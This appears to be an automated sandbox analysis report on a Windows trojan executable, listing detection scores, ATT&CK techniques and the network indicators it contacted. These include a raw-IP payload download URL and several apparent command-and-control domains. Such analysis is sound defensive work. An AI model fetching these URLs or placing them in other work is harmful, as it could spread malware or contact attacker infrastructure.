    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004218BC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218BC
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00420BE6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BE6
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007A1B23 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_007A1B23
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007A0E4D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_007A0E4D
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Native API
    1
    DLL Side-Loading
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Screen Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Query Registry
    Remote Desktop Protocol1
    Archive Collected Data
    12
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager131
    Security Software Discovery
    SMB/Windows Admin Shares3
    Clipboard Data
    2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Deobfuscate/Decode Files or Information
    NTDS1
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput Capture123
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
    Obfuscated Files or Information
    LSA Secrets1
    Process Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
    Software Packing
    Cached Domain Credentials1
    Application Window Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSync2
    File and Directory Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
    System Information Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    g3toRYa6JE.exe39%VirustotalBrowse
    g3toRYa6JE.exe50%ReversingLabsWin32.Trojan.CrypterX
    g3toRYa6JE.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\26A5.tmp.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ScreenUpdateSync[1].exe50%ReversingLabsWin32.Trojan.CrypterX
    C:\Users\user\AppData\Local\Temp\26A5.tmp.exe50%ReversingLabsWin32.Trojan.CrypterX
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://post-to-me.com/track_prt.php?sub=0&cc=DE/100%Avira URL Cloudmalware
    http://176.113.115.19/ScreenUpdateSync.exe(Ka0%Avira URL Cloudsafe
    http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE0%Avira URL Cloudsafe
    https://crowdwarek.shop/100%Avira URL Cloudmalware
    https://post-to-me.com/100%Avira URL Cloudmalware
    https://post-to-me.com/track_prt.php?sub=0&cc=DEQ100%Avira URL Cloudmalware
    http://176.113.115.19/ScreenUpdateSync.exe$KU0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    post-to-me.com
    104.21.56.70
    truefalse
      high
      steamcommunity.com
      104.102.49.254
      truefalse
        high
        femalsabler.shop
        unknown
        unknownfalse
          high
          robinsharez.shop
          unknown
          unknownfalse
            high
            soundtappysk.shop
            unknown
            unknownfalse
              high
              crowdwarek.shop
              unknown
              unknownfalse
                high
                versersleep.shop
                unknown
                unknownfalse
                  high
                  skidjazzyric.click
                  unknown
                  unknownfalse
                    high
                    chipdonkeruz.shop
                    unknown
                    unknownfalse
                      high
                      apporholis.shop
                      unknown
                      unknownfalse
                        high
                        handscreamny.shop
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          robinsharez.shopfalse
                            high
                            versersleep.shopfalse
                              high
                              crowdwarek.shopfalse
                                high
                                skidjazzyric.clickfalse
                                  high
                                  https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                                    high
                                    femalsabler.shopfalse
                                      high
                                      https://steamcommunity.com/profiles/76561199724331900false
                                        high
                                        soundtappysk.shopfalse
                                          high
                                          apporholis.shopfalse
                                            high
                                            handscreamny.shopfalse
                                              high
                                              chipdonkeruz.shopfalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://steamcommunity.com/my/wishlist/26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://player.vimeo.com26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://steamcommunity.com/?subsection=broadcasts26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://176.113.115.19/ScreenUpdateSync.exe(Kag3toRYa6JE.exe, 00000000.00000002.3872617941.00000000006D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://help.steampowered.com/en/26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://steamcommunity.com/market/26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://store.steampowered.com/news/26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://post-to-me.com/track_prt.php?sub=0&cc=DE/g3toRYa6JE.exe, 00000000.00000002.3872617941.0000000000726000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://store.steampowered.com/subscriber_agreement/26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.gstatic.cn/recaptcha/26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://store.steampowered.com/subscriber_agreement/26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://recaptcha.net/recaptcha/;26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://176.113.115.19/ScreenUpdateSync.exeg3toRYa6JE.exe, g3toRYa6JE.exe, 00000000.00000002.3872617941.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.valvesoftware.com/legal.htm26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://steamcommunity.com/discussions/26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.youtube.com26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.google.com26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://store.steampowered.com/stats/26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWAREg3toRYa6JE.exe, 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://medal.tv26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://broadcast.st.dl.eccdnx.com26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://store.steampowered.com/steam_refunds/26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536013159.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://steamcommunity.com/login/home/?goto=profiles%2F7656119972433190026A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af626A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=96201626A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://s.ytimg.com;26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://crowdwarek.shop/26A5.tmp.exe, 00000003.00000003.1536013159.0000000000615000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789098662.0000000000618000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000617000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    unknown
                                                                                                                    https://steamcommunity.com/workshop/26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://login.steampowered.com/26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb26A5.tmp.exe, 00000003.00000002.1789098662.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=126A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://store.steampowered.com/legal/26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://steam.tv/26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://post-to-me.com/track_prt.php?sub=&cc=DEg3toRYa6JE.exe, 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://store.steampowered.com/privacy_agreement/26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://store.steampowered.com/points/shop/26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://recaptcha.net26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://sketchfab.com26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://lv.queniujq.cn26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.youtube.com/26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
